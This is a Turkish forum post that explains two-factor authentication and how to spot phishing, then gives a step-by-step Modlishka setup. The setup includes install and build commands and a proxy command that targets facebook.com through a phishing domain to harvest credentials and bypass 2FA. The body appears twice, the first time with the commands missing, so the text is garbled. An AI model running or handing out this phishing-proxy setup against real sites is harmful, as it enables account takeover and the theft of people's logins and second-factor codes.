- 17 Nis 2021
- 72
- 27
Bu yazımda 2FA, Kimlik Avı ve Modlishka (2FA Kimlik Avı) bahsedeceğim.
Yazımıza 2FA Nedir İle Başlayalım;
2FA (İki Faktörlü Kimlik Doğrulaması)
2FA genelde web sitelerinde ikinci hesap koruma yöntemi olarak bilinir. Yani herhangi bir kullanıcı, Adını ve Şifresini yazdığında SMS doğrulamasına atarak kimlik güvenliği için kod ister. Bu koduda yalnızca kullanıcı görebilir.
2FA Neden Kullanmalıyız?
Günümüzde yeni yeni kullanılmaya başlanan ve yaygın hale getirilen bu güvenlik katmanı hesap güvenliği, kişisel bilgiler, banka bilgileri korunmasında yardımcı olabilecek güçlü bir güvenlik katmanıdır. Bir saldırgan, Adını ve Şifresini girdiğinde ilerlese bile SMS doğrulamasında takılır ancak bazı saldırganlar “Phishing” yani sosyal mühendislik yöntemiyle bunu da kolaylıkla atlatır.
Kimlik Avı kısaca Sanal Dolandırıcılık;
Bir saldırgan, E-Posta yöntemi ve sahte domainler ile kolayca bir senaryo hazırlayıp kullanıcıdan bilgileri alabilir. Günümüzde kullanılan en yaygın olan Phishing, saldırgan için oldukça basittir. Bir E-Posta gönderip, tıklamasını sağlatarak bir çok bilgiye kolayca ulaşır.
Kimlik Avı Anlama Yöntemleri
*E-Postalar kurumsal değil, bireyseldir.
[email protected]
[email protected]
*Web sitesi barındırıyorsa gerçek değil, benzeridir.
-gmail.com
-gmaail.com
*Mesajlarda maddi istekler bulunabilir. Unutmayın, hiçbir şirket sizden maddiyat talep etmez.
*Mesajda noktalama hataları, yazım yanlışları veya anlam bozuklukları olabilir.
Posta değilde Web Sitesi İse;
*HTTP yerine HTTPS olmasına dikkat edin.
*Güvenmediğiniz sitelere bilgilerinizi kesinlikle girmeyin.
Şimdi ise gelelim Kimlik Avı yöntemimize
Gerekenler;
*Kali Linux
*Modlishka
Şimdi gelelim Modlishka kurulumuna;
Linux Termalimizi açıp şu kodu girelim
Şimdi “Go” klasörümüze gidip yeni kodumuzu yazıyoruz ve çalıştırıyoruz
Ve
Modlishka’yı Çalıştıralım;
“Dist” klasörüne gidip proxyi çalıştıralım.
Devamında;
1.Karşınıza birçok farklı seçecek çıkacaktır. Şimdi bu phishingi güvenilir hale getirmek için “openssl” kullanarak kendi sertifikamızı oluşturalım.
2.Proxy’i görmek için aşağıda vereceğim kodu çalıştırmanız yeterli olacaktır.
3.Kodumuzda PhishingDomain kullanacağız ancak ihtiyaçlara göre değiştirebilirsiniz.
4.OpenSSL kullandığımız için “ 'loopback.modlishka.io’ ” bu adresi kullanacağız.
5. Tabi bu adresi kullanmak istiyorsanız dosyanızın “index.html” kısmını (/var/www) olarak değiştirmelisiniz.
Artık sahip olduğunuz tüm kimlik avı bilgilerinizi
kısmından görebilirsiniz.
Yazımıza 2FA Nedir İle Başlayalım;
2FA (İki Faktörlü Kimlik Doğrulaması)
2FA genelde web sitelerinde ikinci hesap koruma yöntemi olarak bilinir. Yani herhangi bir kullanıcı, Adını ve Şifresini yazdığında SMS doğrulamasına atarak kimlik güvenliği için kod ister. Bu koduda yalnızca kullanıcı görebilir.
2FA Neden Kullanmalıyız?
Günümüzde yeni yeni kullanılmaya başlanan ve yaygın hale getirilen bu güvenlik katmanı hesap güvenliği, kişisel bilgiler, banka bilgileri korunmasında yardımcı olabilecek güçlü bir güvenlik katmanıdır. Bir saldırgan, Adını ve Şifresini girdiğinde ilerlese bile SMS doğrulamasında takılır ancak bazı saldırganlar “Phishing” yani sosyal mühendislik yöntemiyle bunu da kolaylıkla atlatır.
Kimlik Avı kısaca Sanal Dolandırıcılık;
Bir saldırgan, E-Posta yöntemi ve sahte domainler ile kolayca bir senaryo hazırlayıp kullanıcıdan bilgileri alabilir. Günümüzde kullanılan en yaygın olan Phishing, saldırgan için oldukça basittir. Bir E-Posta gönderip, tıklamasını sağlatarak bir çok bilgiye kolayca ulaşır.
Kimlik Avı Anlama Yöntemleri
*E-Postalar kurumsal değil, bireyseldir.
[email protected]
[email protected]
*Web sitesi barındırıyorsa gerçek değil, benzeridir.
-gmail.com
-gmaail.com
*Mesajlarda maddi istekler bulunabilir. Unutmayın, hiçbir şirket sizden maddiyat talep etmez.
*Mesajda noktalama hataları, yazım yanlışları veya anlam bozuklukları olabilir.
Posta değilde Web Sitesi İse;
*HTTP yerine HTTPS olmasına dikkat edin.
*Güvenmediğiniz sitelere bilgilerinizi kesinlikle girmeyin.
Şimdi ise gelelim Kimlik Avı yöntemimize
Gerekenler;
*Kali Linux
*Modlishka
Şimdi gelelim Modlishka kurulumuna;
Linux Termalimizi açıp şu kodu girelim
Kod:
-go get -u github.com/drk1wi/Modlishka
Şimdi “Go” klasörümüze gidip yeni kodumuzu yazıyoruz ve çalıştırıyoruz
Kod:
-cd $GOPATH/go/src/github.com/drk1wi/Modlishka/ Attribution
Kod:
-Make
Modlishka’yı Çalıştıralım;
“Dist” klasörüne gidip proxyi çalıştıralım.
Kod:
-cd dist/
./proxy -h
Devamında;
1.Karşınıza birçok farklı seçecek çıkacaktır. Şimdi bu phishingi güvenilir hale getirmek için “openssl” kullanarak kendi sertifikamızı oluşturalım.
2.Proxy’i görmek için aşağıda vereceğim kodu çalıştırmanız yeterli olacaktır.
3.Kodumuzda PhishingDomain kullanacağız ancak ihtiyaçlara göre değiştirebilirsiniz.
4.OpenSSL kullandığımız için “ 'loopback.modlishka.io’ ” bu adresi kullanacağız.
5. Tabi bu adresi kullanmak istiyorsanız dosyanızın “index.html” kısmını (/var/www) olarak değiştirmelisiniz.
Kod:
./proxy -target https://facebook.com -phishingDomain loopback.modlishka.io -listeningPort 80
Artık sahip olduğunuz tüm kimlik avı bilgilerinizi
Kod:
http://loopback.modlishka.io/SayHello2Modlishka/